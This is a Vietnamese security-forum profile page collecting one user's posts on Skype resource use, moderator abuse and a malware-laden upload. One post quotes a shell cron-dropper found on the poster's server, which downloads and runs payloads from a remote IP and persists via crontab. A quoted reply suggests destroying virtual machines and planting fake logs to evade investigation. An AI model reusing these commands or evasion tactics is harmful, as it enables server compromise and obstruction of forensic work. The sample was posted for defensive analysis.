banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: dancerhp  XML
Profile for dancerhp Messages posted by dancerhp [ number of posts not being displayed on this page: 0 ]
 
Skype của em 2 hôm nay nó ngốn bình quân 50% CPU và 300MB ram, em đã gỡ, dọn dẹp rác rưởi, cài lại nhưng vẫn bị vậy.
Hiện em dùng ESET 5.2.91 update mới nhất.

Nhờ các bác chuẩn đoán giúp em trường hợp này vợ ạ.

Ảnh chụp process: https://drive.google.com/file/d/0B2ZSr8t8dYCnTkJiRmxIX01odjA/edit?usp=sharing

Thanks.
Em này em thấy dạo này nó hay tấn công sv của em, nằm tại địa chỉ: http://221.132.37.26/xx,

Nó tạo ra 1 cronjob như sau:
Code:
#!/bin/sh
cd /dev/shm
wget -q http://221.132.37.26/xx -O .xx
chmod +x .xx
./.xx
echo "@weekly wget -q http://221.132.37.26/scen -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/corn
crontab /tmp/corn
rm -rf /tmp/corn

Nhờ các bác kiểm tra dùm xem nó đang cố làm trò gì với ạ.

Regard.
Theo như em biết thì VNPT cũng dùng nhiều hàng này lắm, không biết động thái thế nào rồi có ai nắm được không?
Việc lạm dụng quyền để ban lock thành viên ở các diễn đàn hoạt động vì cơm áo gạo tiền thì phổ biến lắm. Nhưng ở HVA, một diễn đàn của anh em kỹ thuật - không vụ lợi - nơi mà anh em được thoải mái bày tỏ quan điểm của mình (miễn là không trái với nội quy) thì những hành động lạm dụng quyền cần bị loại bỏ. Đồng ý với ý kiến của tranvaminh nếu xnohat lạm quyền như vậy.

phonglanbiec wrote:
...
Tuy nhiên, sự thật là sự thật, nếu người khác có thời gian, chắc chắn họ sẽ tìm ra. Do vậy, ngoài việc có thể/không có thể can thiệp vào log của server. Ta còn phải tạo cho mình 1 vỏ bọc an toàn. Ví dụ như máy tính ta sau khi tấn công xong phải huỷ hết mọi thông tin: ví dụ như tấn công từ VMWare, sau khi tấn công xong thì lưu mọi thông tin đó lên Internet, huỷ ngay máy VMWare đó. Máy luôn sẵn sàng có 1 chương trình làm backdoor, 1 log ảo nhằm nếu bị phát hiện, thì ta vẫn có thể chứng minh mình là 1 nạn nhân trong 1 quá trình smilie

 


Mình thấy nếu mà dùng cách sử dụng backdoor, log ảo để chứng mình không ổn lắm smilie nếu bạn làm vậy thì người ta cũng có thể chứng minh bạn đã làm vậy smilie

camaptrang wrote:
sử dụng skype để chat thì bảo mật hơn ym và msn hay google chat .... nhưng skype lúc trước nó bị cái là 1 account đồng thời có nhiều máy cùng logon bằng 1 account khi đó 2 người nói chuyện người thứ 3 ngồi xem, hiện giờ không biết skype đã fix vấn đề này chưa ...
 

Cái này hiện tại vẫn còn, ko biết dụng ý của skype là gì, nhưng nó cũng là một tính năng lý thú: Ví dụ mình dùng skype trên laptop và PC đồng thời luôn chẳng hạn.



Cái posting time của HVA có vẻ như bị trục trặc??

al0nex wrote:

dancerhp wrote:
Một đống trojan và backdoor, định cài cắm gì đây ông bạn?
https://www.virustotal.com/file/358f3c8b2a9dc2e3ad15049c0c6008915792b7332a59dde9d67da65b362ed3d8/analysis/ 


cậu có thể ko xài ! tôi ko thừa hơi mà gắn virus vô. rùi post lên 1 diễn đàn hva toàn các cao thủ smilie

nghĩ mà buồn cười smilie 


Bạn có ngó qua cái link tôi gửi không? Nếu bạn không đính kèm thì bạn cũng là một nạn nhân! Chả có gì buồn cười ở đây cả, chỉ buồn cười là việc cậu thấy buồn cười. smilie
Một đống trojan và backdoor, định cài cắm gì đây ông bạn?
https://www.virustotal.com/file/358f3c8b2a9dc2e3ad15049c0c6008915792b7332a59dde9d67da65b362ed3d8/analysis/
Hôm qua kiểm tra và đưa kết quả lên trên này:
/hvaonline/posts/list/41381.html#256320
Có bác còn bảo là có phiên bản Unikey mới smilie
Không có driver thì chịu thôi bạn ơi!
Mà cái này bạn muốn crack thì phải có dict cho nó, cái dict này gặp phải thằng nào nó đặt pass oái oăm thì có dò cả ngày không ra smilie
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|